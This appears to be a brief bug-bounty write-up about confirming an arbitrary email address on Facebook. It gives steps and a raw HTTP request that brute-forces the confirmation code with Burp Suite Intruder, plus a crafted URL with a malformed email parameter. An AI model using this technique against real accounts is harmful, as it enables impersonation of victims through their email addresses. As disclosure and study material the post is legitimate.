Confirming any new Email Address bug in Facebook (Part-4)

https://m.facebook.com/confirmemail.php?e=victim@mail.com@&c=15579&report=1&message=1
  1. Create any New Facebook Account with Victim’s Email Address.
  2. Open Burp Suite and paste the below request in Intruder.
GET /confirmemail.php?e=redacted@email.com&c=12345&report=1&message=1 HTTP/1.1Host: m.facebook.comConnection: closeUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: c_user=0; xs=0;

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store